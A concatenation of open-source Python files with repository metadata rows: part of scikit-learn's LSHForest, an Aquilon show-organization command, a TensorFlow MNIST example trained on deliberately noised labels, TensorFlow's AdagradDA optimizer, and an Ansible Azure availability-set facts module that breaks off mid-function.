>>> lshf.fit(X_train) # doctest: +NORMALIZE_WHITESPACE
LSHForest(min_hash_match=4, n_candidates=50, n_estimators=10,
n_neighbors=5, radius=1.0, radius_cutoff_ratio=0.9,
random_state=42)
>>> distances, indices = lshf.kneighbors(X_test, n_neighbors=2)
>>> distances # doctest: +ELLIPSIS
array([[ 0.069..., 0.149...],
[ 0.229..., 0.481...],
[ 0.004..., 0.014...]])
>>> indices
array([[1, 2],
[2, 0],
[4, 0]])
"""
def __init__(self, n_estimators=10, radius=1.0, n_candidates=50,
n_neighbors=5, min_hash_match=4, radius_cutoff_ratio=.9,
random_state=None):
self.n_estimators = n_estimators
self.radius = radius
self.random_state = random_state
self.n_candidates = n_candidates
self.n_neighbors = n_neighbors
self.min_hash_match = min_hash_match
self.radius_cutoff_ratio = radius_cutoff_ratio
warnings.warn("LSHForest has poor performance and has been deprecated "
"in 0.19. It will be removed in version 0.21.",
DeprecationWarning)
def _compute_distances(self, query, candidates):
"""Computes the cosine distance.
Distance is from the query to points in the candidates array.
Returns argsort of distances in the candidates
array and sorted distances.
"""
if candidates.shape == (0,):
# needed since _fit_X[np.array([])] doesn't work if _fit_X sparse
return np.empty(0, dtype=np.int), np.empty(0, dtype=float)
if sparse.issparse(self._fit_X):
candidate_X = self._fit_X[candidates]
else:
candidate_X = self._fit_X.take(candidates, axis=0, mode='clip')
distances = pairwise_distances(query, candidate_X,
metric='cosine')[0]
distance_positions = np.argsort(distances)
distances = distances.take(distance_positions, mode='clip', axis=0)
return distance_positions, distances
def _generate_masks(self):
"""Creates left and right masks for all hash lengths."""
tri_size = MAX_HASH_SIZE + 1
# Called once on fitting, output is independent of hashes
left_mask = np.tril(np.ones((tri_size, tri_size), dtype=int))[:, 1:]
right_mask = left_mask[::-1, ::-1]
self._left_mask = np.packbits(left_mask).view(dtype=HASH_DTYPE)
self._right_mask = np.packbits(right_mask).view(dtype=HASH_DTYPE)
def _get_candidates(self, query, max_depth, bin_queries, n_neighbors):
"""Performs the Synchronous ascending phase.
Returns an array of candidates, their distance ranks and
distances.
"""
index_size = self._fit_X.shape[0]
# Number of candidates considered including duplicates
# XXX: not sure whether this is being calculated correctly wrt
# duplicates from different iterations through a single tree
n_candidates = 0
candidate_set = set()
min_candidates = self.n_candidates * self.n_estimators
while (max_depth > self.min_hash_match and
(n_candidates < min_candidates or
len(candidate_set) < n_neighbors)):
left_mask = self._left_mask[max_depth]
right_mask = self._right_mask[max_depth]
for i in range(self.n_estimators):
start, stop = _find_matching_indices(self.trees_[i],
bin_queries[i],
left_mask, right_mask)
n_candidates += stop - start
candidate_set.update(
self.original_indices_[i][start:stop].tolist())
max_depth -= 1
candidates = np.fromiter(candidate_set, count=len(candidate_set),
dtype=np.intp)
# For insufficient candidates, candidates are filled.
# Candidates are filled from unselected indices uniformly.
if candidates.shape[0] < n_neighbors:
warnings.warn(
"Number of candidates is not sufficient to retrieve"
" %i neighbors with"
" min_hash_match = %i. Candidates are filled up"
" uniformly from unselected"
" indices." % (n_neighbors, self.min_hash_match))
remaining = np.setdiff1d(np.arange(0, index_size), candidates)
to_fill = n_neighbors - candidates.shape[0]
candidates = np.concatenate((candidates, remaining[:to_fill]))
ranks, distances = self._compute_distances(query,
candidates.astype(int))
return (candidates[ranks[:n_neighbors]],
distances[:n_neighbors])
def _get_radius_neighbors(self, query, max_depth, bin_queries, radius):
"""Finds radius neighbors from the candidates obtained.
Their distances from query are smaller than radius.
Returns radius neighbors and distances.
"""
ratio_within_radius = 1
threshold = 1 - self.radius_cutoff_ratio
total_candidates = np.array([], dtype=int)
total_neighbors = np.array([], dtype=int)
total_distances = np.array([], dtype=float)
while (max_depth > self.min_hash_match and
ratio_within_radius > threshold):
left_mask = self._left_mask[max_depth]
right_mask = self._right_mask[max_depth]
candidates = []
for i in range(self.n_estimators):
start, stop = _find_matching_indices(self.trees_[i],
bin_queries[i],
left_mask, right_mask)
candidates.extend(
self.original_indices_[i][start:stop].tolist())
candidates = np.setdiff1d(candidates, total_candidates)
total_candidates = np.append(total_candidates, candidates)
ranks, distances = self._compute_distances(query, candidates)
m = np.searchsorted(distances, radius, side='right')
positions = np.searchsorted(total_distances, distances[:m])
total_neighbors = np.insert(total_neighbors, positions,
candidates[ranks[:m]])
total_distances = np.insert(total_distances, positions,
distances[:m])
ratio_within_radius = (total_neighbors.shape[0] /
float(total_candidates.shape[0]))
max_depth = max_depth - 1
return total_neighbors, total_distances
def fit(self, X, y=None):
"""Fit the LSH forest on the data.
This creates binary hashes of input data points by getting the
dot product of input points and hash_function then
transforming the projection into a binary string array based
on the sign (positive/negative) of the projection.
A sorted array of binary hashes is created.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
Returns
-------
self : object
Returns self.
"""
self._fit_X = check_array(X, accept_sparse='csr')
# Creates a g(p,x) for each tree
self.hash_functions_ = []
self.trees_ = []
self.original_indices_ = []
rng = check_random_state(self.random_state)
int_max = np.iinfo(np.int32).max
for i in range(self.n_estimators):
# This is g(p,x) for a particular tree.
# Builds a single tree. Hashing is done on an array of data points.
# `GaussianRandomProjection` is used for hashing.
# `n_components=hash size and n_features=n_dim.
hasher = GaussianRandomProjectionHash(MAX_HASH_SIZE,
rng.randint(0, int_max))
hashes = hasher.fit_transform(self._fit_X)[:, 0]
original_index = np.argsort(hashes)
bin_hashes = hashes[original_index]
self.original_indices_.append(original_index)
self.trees_.append(bin_hashes)
self.hash_functions_.append(hasher)
self._generate_masks()
return self
def _query(self, X):
"""Performs descending phase to find maximum depth."""
# Calculate hashes of shape (n_samples, n_estimators, [hash_size])
bin_queries = np.asarray([hasher.transform(X)[:, 0]
for hasher in self.hash_functions_])
bin_queries = np.rollaxis(bin_queries, 1)
# descend phase
depths = [_find_longest_prefix_match(tree, tree_queries, MAX_HASH_SIZE,
self._left_mask, self._right_mask)
for tree, tree_queries in zip(self.trees_,
np.rollaxis(bin_queries, 1))]
return bin_queries, np.max(depths, axis=0)
def kneighbors(self, X, n_neighbors=None, return_distance=True):
"""Returns n_neighbors of approximate nearest neighbors.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single query.
n_neighbors : int, optional (default = None)
Number of neighbors required. If not provided, this will
return the number specified at the initialization.
return_distance : boolean, optional (default = True)
Returns the distances of neighbors if set to True.
Returns
-------
dist : array, shape (n_samples, n_neighbors)
Array representing the cosine distances to each point,
only present if return_distance=True.
ind : array, shape (n_samples, n_neighbors)
Indices of the approximate nearest points in the population
matrix.
"""
if not hasattr(self, 'hash_functions_'):
raise ValueError("estimator should be fitted.")
if n_neighbors is None:
n_neighbors = self.n_neighbors
X = check_array(X, accept_sparse='csr')
neighbors, distances = [], []
bin_queries, max_depth = self._query(X)
for i in range(X.shape[0]):
neighs, dists = self._get_candidates(X[[i]], max_depth[i],
bin_queries[i],
n_neighbors)
neighbors.append(neighs)
distances.append(dists)
if return_distance:
return np.array(distances), np.array(neighbors)
else:
return np.array(neighbors)
def radius_neighbors(self, X, radius=None, return_distance=True):
"""Finds the neighbors within a given radius of a point or points.
Return the indices and distances of some points from the dataset
lying in a ball with size ``radius`` around the points of the query
array. Points lying on the boundary are included in the results.
The result points are *not* necessarily sorted by distance to their
query point.
LSH Forest being an approximate method, some true neighbors from the
indexed dataset might be missing from the results.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single query.
radius : float
Limiting distance of neighbors to return.
(default is the value passed to the constructor).
return_distance : boolean, optional (default = False)
Returns the distances of neighbors if set to True.
Returns
-------
dist : array, shape (n_samples,) of arrays
Each element is an array representing the cosine distances
to some points found within ``radius`` of the respective query.
Only present if ``return_distance=True``.
ind : array, shape (n_samples,) of arrays
Each element is an array of indices for neighbors within ``radius``
of the respective query.
"""
if not hasattr(self, 'hash_functions_'):
raise ValueError("estimator should be fitted.")
if radius is None:
radius = self.radius
X = check_array(X, accept_sparse='csr')
neighbors, distances = [], []
bin_queries, max_depth = self._query(X)
for i in range(X.shape[0]):
neighs, dists = self._get_radius_neighbors(X[[i]], max_depth[i],
bin_queries[i], radius)
neighbors.append(neighs)
distances.append(dists)
if return_distance:
return _array_of_arrays(distances), _array_of_arrays(neighbors)
else:
return _array_of_arrays(neighbors)
def partial_fit(self, X, y=None):
"""
Inserts new data into the already fitted LSH Forest.
Cost is proportional to new total size, so additions
should be batched.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
New data point to be inserted into the LSH Forest.
"""
X = check_array(X, accept_sparse='csr')
if not hasattr(self, 'hash_functions_'):
return self.fit(X)
if X.shape[1] != self._fit_X.shape[1]:
raise ValueError("Number of features in X and"
" fitted array does not match.")
n_samples = X.shape[0]
n_indexed = self._fit_X.shape[0]
for i in range(self.n_estimators):
bin_X = self.hash_functions_[i].transform(X)[:, 0]
# gets the position to be added in the tree.
positions = self.trees_[i].searchsorted(bin_X)
# adds the hashed value into the tree.
self.trees_[i] = np.insert(self.trees_[i],
positions, bin_X)
# add the entry into the original_indices_.
self.original_indices_[i] = np.insert(self.original_indices_[i],
positions,
np.arange(n_indexed,
n_indexed +
n_samples))
# adds the entry into the input_array.
if sparse.issparse(X) or sparse.issparse(self._fit_X):
self._fit_X = sparse.vstack((self._fit_X, X))
else:
self._fit_X = np.row_stack((self._fit_X, X))
return self
| bsd-3-clause | -1,901,045,247,280,568,600 | 39.711191 | 79 | 0.579365 | false |
stdweird/aquilon | lib/python2.6/aquilon/worker/commands/show_organization_all.py | 2 | 1252 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq show organization`."""
from aquilon.worker.broker import BrokerCommand # pylint: disable=W0611
from aquilon.worker.commands.show_location_type import CommandShowLocationType
class CommandShowOrganizationAll(CommandShowLocationType):
required_parameters = []
def render(self, session, **arguments):
return CommandShowLocationType.render(self, session=session,
type='company', name=None,
**arguments)
| apache-2.0 | -456,685,246,226,888,300 | 39.387097 | 78 | 0.702077 | false |
wangxianliang/facenet | tmp/mnist_noise_labels.py | 1 | 15390 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple, end-to-end, LeNet-5-like convolutional MNIST model example.
This should achieve a test error of 0.7%. Please keep this model as simple and
linear as possible, it is meant as a tutorial for simple convolutional models.
Run with --self_test on the command line to execute a short self-test.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import sys
import time
from six.moves import urllib # @UnresolvedImport
import tensorflow as tf
import numpy as np
SOURCE_URL = 'http://yann.lecun.com/exdb/mnist/'
WORK_DIRECTORY = 'data'
IMAGE_SIZE = 28
NUM_CHANNELS = 1
PIXEL_DEPTH = 255
NUM_LABELS = 10
VALIDATION_SIZE = 5000 # Size of the validation set.
SEED = 66478 # Set to None for random seed.
BATCH_SIZE = 64
NUM_EPOCHS = 10
EVAL_BATCH_SIZE = 64
EVAL_FREQUENCY = 100 # Number of steps between evaluations.
NOISE_FACTOR = 0.2
BETA = 0.8
tf.app.flags.DEFINE_boolean("self_test", False, "True if running a self test.")
tf.app.flags.DEFINE_boolean('use_fp16', False,
"Use half floats instead of full floats if True.")
FLAGS = tf.app.flags.FLAGS
def data_type():
"""Return the type of the activations, weights, and placeholder variables."""
if FLAGS.use_fp16:
return tf.float16
else:
return tf.float32
def maybe_download(filename):
"""Download the data from Yann's website, unless it's already here."""
if not tf.gfile.Exists(WORK_DIRECTORY):
tf.gfile.MakeDirs(WORK_DIRECTORY)
filepath = os.path.join(WORK_DIRECTORY, filename)
if not tf.gfile.Exists(filepath):
filepath, _ = urllib.request.urlretrieve(SOURCE_URL + filename, filepath)
with tf.gfile.GFile(filepath) as f:
size = f.size()
print('Successfully downloaded', filename, size, 'bytes.')
return filepath
def extract_data(filename, num_images):
"""Extract the images into a 4D tensor [image index, y, x, channels].
Values are rescaled from [0, 255] down to [-0.5, 0.5].
"""
print('Extracting', filename)
with gzip.open(filename) as bytestream:
bytestream.read(16)
buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)
data = np.frombuffer(buf, dtype=np.uint8).astype(np.float32)
data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH
data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS)
return data
def extract_labels(filename, num_images):
"""Extract the labels into a vector of int64 label IDs."""
print('Extracting', filename)
with gzip.open(filename) as bytestream:
bytestream.read(8)
buf = bytestream.read(1 * num_images)
labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)
return labels
def fake_data(num_images):
"""Generate a fake dataset that matches the dimensions of MNIST."""
data = np.ndarray(
shape=(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS),
dtype=np.float32)
labels = np.zeros(shape=(num_images,), dtype=np.int64)
for image in range(num_images):
label = image % 2
data[image, :, :, 0] = label - 0.5
labels[image] = label
return data, labels
def error_rate(predictions, labels):
"""Return the error rate based on dense predictions and sparse labels."""
return 100.0 - (
100.0 *
np.sum(np.argmax(predictions, 1) == labels) /
predictions.shape[0])
def main(argv=None): # pylint: disable=unused-argument
if FLAGS.self_test:
print('Running self-test.')
train_data, train_labels = fake_data(256)
validation_data, validation_labels = fake_data(EVAL_BATCH_SIZE)
test_data, test_labels = fake_data(EVAL_BATCH_SIZE)
num_epochs = 1
else:
# Get the data.
train_data_filename = maybe_download('train-images-idx3-ubyte.gz')
train_labels_filename = maybe_download('train-labels-idx1-ubyte.gz')
test_data_filename = maybe_download('t10k-images-idx3-ubyte.gz')
test_labels_filename = maybe_download('t10k-labels-idx1-ubyte.gz')
# Extract it into numpy arrays.
train_data = extract_data(train_data_filename, 60000)
train_labels = extract_labels(train_labels_filename, 60000)
test_data = extract_data(test_data_filename, 10000)
test_labels = extract_labels(test_labels_filename, 10000)
# Generate a validation set.
validation_data = train_data[:VALIDATION_SIZE, ...]
validation_labels = train_labels[:VALIDATION_SIZE]
train_data = train_data[VALIDATION_SIZE:, ...]
train_labels = train_labels[VALIDATION_SIZE:]
nrof_training_examples = train_labels.shape[0]
nrof_changed_labels = int(nrof_training_examples*NOISE_FACTOR)
shuf = np.arange(0,nrof_training_examples)
np.random.shuffle(shuf)
change_idx = shuf[0:nrof_changed_labels]
train_labels[change_idx] = (train_labels[change_idx] + np.random.randint(1,9,size=(nrof_changed_labels,))) % NUM_LABELS
num_epochs = NUM_EPOCHS
train_size = train_labels.shape[0]
# This is where training samples and labels are fed to the graph.
# These placeholder nodes will be fed a batch of training data at each
# training step using the {feed_dict} argument to the Run() call below.
train_data_node = tf.placeholder(
data_type(),
shape=(BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
train_labels_node = tf.placeholder(tf.int64, shape=(BATCH_SIZE,))
eval_data = tf.placeholder(
data_type(),
shape=(EVAL_BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
# The variables below hold all the trainable weights. They are passed an
# initial value which will be assigned when we call:
# {tf.global_variables_initializer().run()}
conv1_weights = tf.Variable(
tf.truncated_normal([5, 5, NUM_CHANNELS, 32], # 5x5 filter, depth 32.
stddev=0.1,
seed=SEED, dtype=data_type()))
conv1_biases = tf.Variable(tf.zeros([32], dtype=data_type()))
conv2_weights = tf.Variable(tf.truncated_normal(
[5, 5, 32, 64], stddev=0.1,
seed=SEED, dtype=data_type()))
conv2_biases = tf.Variable(tf.constant(0.1, shape=[64], dtype=data_type()))
fc1_weights = tf.Variable( # fully connected, depth 512.
tf.truncated_normal([IMAGE_SIZE // 4 * IMAGE_SIZE // 4 * 64, 512],
stddev=0.1,
seed=SEED,
dtype=data_type()))
fc1_biases = tf.Variable(tf.constant(0.1, shape=[512], dtype=data_type()))
fc2_weights = tf.Variable(tf.truncated_normal([512, NUM_LABELS],
stddev=0.1,
seed=SEED,
dtype=data_type()))
fc2_biases = tf.Variable(tf.constant(
0.1, shape=[NUM_LABELS], dtype=data_type()))
# We will replicate the model structure for the training subgraph, as well
# as the evaluation subgraphs, while sharing the trainable parameters.
def model(data, train=False):
"""The Model definition."""
# 2D convolution, with 'SAME' padding (i.e. the output feature map has
# the same size as the input). Note that {strides} is a 4D array whose
# shape matches the data layout: [image index, y, x, depth].
conv = tf.nn.conv2d(data,
conv1_weights,
strides=[1, 1, 1, 1],
padding='SAME')
# Bias and rectified linear non-linearity.
relu = tf.nn.relu(tf.nn.bias_add(conv, conv1_biases))
# Max pooling. The kernel size spec {ksize} also follows the layout of
# the data. Here we have a pooling window of 2, and a stride of 2.
pool = tf.nn.max_pool(relu,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
conv = tf.nn.conv2d(pool,
conv2_weights,
strides=[1, 1, 1, 1],
padding='SAME')
relu = tf.nn.relu(tf.nn.bias_add(conv, conv2_biases))
pool = tf.nn.max_pool(relu,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
# Reshape the feature map cuboid into a 2D matrix to feed it to the
# fully connected layers.
pool_shape = pool.get_shape().as_list() #pylint: disable=no-member
reshape = tf.reshape(
pool,
[pool_shape[0], pool_shape[1] * pool_shape[2] * pool_shape[3]])
# Fully connected layer. Note that the '+' operation automatically
# broadcasts the biases.
hidden = tf.nn.relu(tf.matmul(reshape, fc1_weights) + fc1_biases)
# Add a 50% dropout during training only. Dropout also scales
# activations such that no rescaling is needed at evaluation time.
if train:
hidden = tf.nn.dropout(hidden, 0.5, seed=SEED)
return tf.matmul(hidden, fc2_weights) + fc2_biases
# Training computation: logits + cross-entropy loss.
logits = model(train_data_node, True)
# t: observed noisy labels
# q: estimated class probabilities (output from softmax)
# z: argmax of q
t = tf.one_hot(train_labels_node, NUM_LABELS)
q = tf.nn.softmax(logits)
qqq = tf.arg_max(q, dimension=1)
z = tf.one_hot(qqq, NUM_LABELS)
#cross_entropy = -tf.reduce_sum(t*tf.log(q),reduction_indices=1)
cross_entropy = -tf.reduce_sum((BETA*t+(1-BETA)*z)*tf.log(q),axis=1)
loss = tf.reduce_mean(cross_entropy)
# loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
# logits, train_labels_node))
# L2 regularization for the fully connected parameters.
regularizers = (tf.nn.l2_loss(fc1_weights) + tf.nn.l2_loss(fc1_biases) +
tf.nn.l2_loss(fc2_weights) + tf.nn.l2_loss(fc2_biases))
# Add the regularization term to the loss.
loss += 5e-4 * regularizers
# Optimizer: set up a variable that's incremented once per batch and
# controls the learning rate decay.
batch = tf.Variable(0, dtype=data_type())
# Decay once per epoch, using an exponential schedule starting at 0.01.
learning_rate = tf.train.exponential_decay(
0.01, # Base learning rate.
batch * BATCH_SIZE, # Current index into the dataset.
train_size, # Decay step.
0.95, # Decay rate.
staircase=True)
# Use simple momentum for the optimization.
optimizer = tf.train.MomentumOptimizer(learning_rate,
0.9).minimize(loss,
global_step=batch)
# Predictions for the current training minibatch.
train_prediction = tf.nn.softmax(logits)
# Predictions for the test and validation, which we'll compute less often.
eval_prediction = tf.nn.softmax(model(eval_data))
# Small utility function to evaluate a dataset by feeding batches of data to
# {eval_data} and pulling the results from {eval_predictions}.
# Saves memory and enables this to run on smaller GPUs.
def eval_in_batches(data, sess):
"""Get all predictions for a dataset by running it in small batches."""
size = data.shape[0]
if size < EVAL_BATCH_SIZE:
raise ValueError("batch size for evals larger than dataset: %d" % size)
predictions = np.ndarray(shape=(size, NUM_LABELS), dtype=np.float32)
for begin in xrange(0, size, EVAL_BATCH_SIZE):
end = begin + EVAL_BATCH_SIZE
if end <= size:
predictions[begin:end, :] = sess.run(
eval_prediction,
feed_dict={eval_data: data[begin:end, ...]})
else:
batch_predictions = sess.run(
eval_prediction,
feed_dict={eval_data: data[-EVAL_BATCH_SIZE:, ...]})
predictions[begin:, :] = batch_predictions[begin - size:, :]
return predictions
# Create a local session to run the training.
start_time = time.time()
with tf.Session() as sess:
# Run all the initializers to prepare the trainable parameters.
tf.global_variables_initializer().run() #pylint: disable=no-member
print('Initialized!')
# Loop through training steps.
for step in xrange(int(num_epochs * train_size) // BATCH_SIZE):
# Compute the offset of the current minibatch in the data.
# Note that we could use better randomization across epochs.
offset = (step * BATCH_SIZE) % (train_size - BATCH_SIZE)
batch_data = train_data[offset:(offset + BATCH_SIZE), ...]
batch_labels = train_labels[offset:(offset + BATCH_SIZE)]
# This dictionary maps the batch data (as a numpy array) to the
# node in the graph it should be fed to.
feed_dict = {train_data_node: batch_data,
train_labels_node: batch_labels}
# Run the graph and fetch some of the nodes.
_, l, lr, predictions = sess.run(
[optimizer, loss, learning_rate, train_prediction],
feed_dict=feed_dict)
if step % EVAL_FREQUENCY == 0:
elapsed_time = time.time() - start_time
start_time = time.time()
print('Step %d (epoch %.2f), %.1f ms' %
(step, float(step) * BATCH_SIZE / train_size,
1000 * elapsed_time / EVAL_FREQUENCY))
print('Minibatch loss: %.3f, learning rate: %.6f' % (l, lr))
print('Minibatch error: %.1f%%' % error_rate(predictions, batch_labels))
print('Validation error: %.1f%%' % error_rate(
eval_in_batches(validation_data, sess), validation_labels))
sys.stdout.flush()
# Finally print the result!
test_error = error_rate(eval_in_batches(test_data, sess), test_labels)
print('Test error: %.1f%%' % test_error)
if FLAGS.self_test:
print('test_error', test_error)
assert test_error == 0.0, 'expected 0.0 test_error, got %.2f' % (
test_error,)
if __name__ == '__main__':
tf.app.run()
| mit | 8,634,300,840,375,226,000 | 43.479769 | 127 | 0.601105 | false |
Weihonghao/ECM | Vpy34/lib/python3.5/site-packages/tensorflow/python/training/adagrad_da.py | 34 | 5998 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adagrad Dual Averaging for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.training import optimizer
from tensorflow.python.training import training_ops
class AdagradDAOptimizer(optimizer.Optimizer):
"""Adagrad Dual Averaging algorithm for sparse linear models.
See this [paper](http://www.jmlr.org/papers/volume12/duchi11a/duchi11a.pdf).
This optimizer takes care of regularization of unseen features in a mini batch
by updating them when they are seen with a closed form update rule that is
equivalent to having updated them on every mini-batch.
AdagradDA is typically used when there is a need for large sparsity in the
trained model. This optimizer only guarantees sparsity for linear models. Be
careful when using AdagradDA for deep networks as it will require careful
initialization of the gradient accumulators for it to train.
@@__init__
"""
def __init__(self,
learning_rate,
global_step,
initial_gradient_squared_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0,
use_locking=False,
name="AdagradDA"):
"""Construct a new AdagradDA optimizer.
Args:
learning_rate: A `Tensor` or a floating point value. The learning rate.
global_step: A `Tensor` containing the current training step number.
initial_gradient_squared_accumulator_value: A floating point value.
Starting value for the accumulators, must be positive.
l1_regularization_strength: A float value, must be greater than or
equal to zero.
l2_regularization_strength: A float value, must be greater than or
equal to zero.
use_locking: If `True` use locks for update operations.
name: Optional name prefix for the operations created when applying
gradients. Defaults to "AdagradDA".
Raises:
ValueError: If the `initial_gradient_squared_accumulator_value` is
invalid.
"""
if initial_gradient_squared_accumulator_value <= 0.0:
raise ValueError("initial_gradient_squared_accumulator_value must be"
"positive: %s" %
initial_gradient_squared_accumulator_value)
super(AdagradDAOptimizer, self).__init__(use_locking, name)
self._learning_rate = learning_rate
self._initial_gradient_squared_accumulator_value = (
initial_gradient_squared_accumulator_value)
# Created in Initialize.
self._learning_rate_tensor = None
self._l1_regularization_strength = l1_regularization_strength
self._l2_regularization_strength = l2_regularization_strength
self._global_step = global_step
def _create_slots(self, var_list):
for v in var_list:
with ops.colocate_with(v):
g_val = constant_op.constant(
0.0, shape=v.get_shape(), dtype=v.dtype.base_dtype)
gg_val = constant_op.constant(
self._initial_gradient_squared_accumulator_value,
shape=v.get_shape(),
dtype=v.dtype.base_dtype)
self._get_or_make_slot(v, g_val, "gradient_accumulator", self._name)
self._get_or_make_slot(v, gg_val, "gradient_squared_accumulator",
self._name)
def _prepare(self):
self._learning_rate_tensor = ops.convert_to_tensor(
self._learning_rate, name="learning_rate")
def _apply_dense(self, grad, var):
g_acc = self.get_slot(var, "gradient_accumulator")
gg_acc = self.get_slot(var, "gradient_squared_accumulator")
# Performance optimization so that worker creates a copy of the global step
# to avoid overloading the parameter server holding the global step.
with ops.device(grad[0].device):
global_step = array_ops.identity(self._global_step) + 1
return training_ops.apply_adagrad_da(
var,
g_acc,
gg_acc,
grad,
math_ops.cast(self._learning_rate_tensor, var.dtype.base_dtype),
math_ops.cast(self._l1_regularization_strength, var.dtype.base_dtype),
math_ops.cast(self._l2_regularization_strength, var.dtype.base_dtype),
global_step,
use_locking=self._use_locking)
def _apply_sparse(self, grad, var):
g_acc = self.get_slot(var, "gradient_accumulator")
gg_acc = self.get_slot(var, "gradient_squared_accumulator")
# Performance optimization so that worker creates a copy of the global step
# to avoid overloading the parameter server holding the global step.
with ops.device(grad[0].device):
global_step = array_ops.identity(self._global_step) + 1
return training_ops.sparse_apply_adagrad_da(
var,
g_acc,
gg_acc,
grad.values,
grad.indices,
math_ops.cast(self._learning_rate_tensor, var.dtype.base_dtype),
math_ops.cast(self._l1_regularization_strength, var.dtype.base_dtype),
math_ops.cast(self._l2_regularization_strength, var.dtype.base_dtype),
global_step,
use_locking=self._use_locking)
| agpl-3.0 | 5,934,173,522,810,177,000 | 42.463768 | 80 | 0.680894 | false |
bregman-arie/ansible | lib/ansible/modules/cloud/azure/azure_rm_availabilityset_facts.py | 15 | 4569 | #!/usr/bin/python
#
# Copyright (c) 2016 Julien Stroheker, <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_availabilityset_facts
version_added: "2.4"
short_description: Get availability set facts.
description:
- Get facts for a specific availability set or all availability sets.
options:
name:
description:
- Limit results to a specific availability set
resource_group:
description:
- The resource group to search for the desired availability set
extends_documentation_fragment:
- azure
author:
- "Julien Stroheker (@julienstroheker)"
'''
EXAMPLES = '''
- name: Get facts for one availability set
azure_rm_availabilityset_facts:
name: Testing
resource_group: TestRG
- name: Get facts for all availability sets in a specific resource group
azure_rm_availabilityset_facts:
resource_group: TestRG
'''
RETURN = '''
azure_availabilityset:
description: List of availability sets dicts.
returned: always
type: list
example: [{
"location": "eastus2",
"name": "myavailabilityset",
"properties": {
"platformFaultDomainCount": 3,
"platformUpdateDomainCount": 2,
"virtualMachines": []
},
"sku": "Aligned",
"type": "Microsoft.Compute/availabilitySets"
}]
'''
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.azure_exceptions import CloudError
except:
# handled in azure_rm_common
pass
AZURE_OBJECT_CLASS = 'AvailabilitySet'
class AzureRMAvailabilitySetFacts(AzureRMModuleBase):
"""Utility class to get availability set facts"""
def __init__(self):
self.module_args = dict(
name=dict(type='str'),
resource_group=dict(type='str'),
tags=dict(type='list')
)
self.results = dict(
changed=False,
ansible_facts=dict(
azure_availabilitysets=[]
)
)
self.name = None
self.resource_group = None
self.tags = None
super(AzureRMAvailabilitySetFacts, self).__init__(
derived_arg_spec=self.module_args,
supports_tags=False,
facts_module=True
)
def exec_module(self, **kwargs):
for key in self.module_args:
setattr(self, key, kwargs[key])
if self.name and not self.resource_group:
self.fail("Parameter error: resource group required when filtering by name.")
if self.name:
self.results['ansible_facts']['azure_availabilitysets'] = self.get_item()
else:
self.results['ansible_facts']['azure_availabilitysets'] = self.list_items()
return self.results
def get_item(self):
"""Get a single availability set"""
self.log('Get properties for {}'.format(self.name))
item = None
result = []
try:
item = self.compute_client.availability_sets.get(self.resource_group, self.name)
except CloudError:
pass
if item and self.has_tags(item.tags, self.tags):
avase = self.serialize_obj(item, AZURE_OBJECT_CLASS)
avase['name'] = item.name
avase['type'] = item.type
avase['sku'] = item.sku.name
result = [avase]
return result
def list_items(self):
"""Get all availability sets"""
self.log('List all availability sets')
try:
response = self.compute_client.availability_sets.list(self.resource_group)
except CloudError as exc:
self.fail('Failed to list all items - {}'.format(str(exc)))
results = []
for item in response:
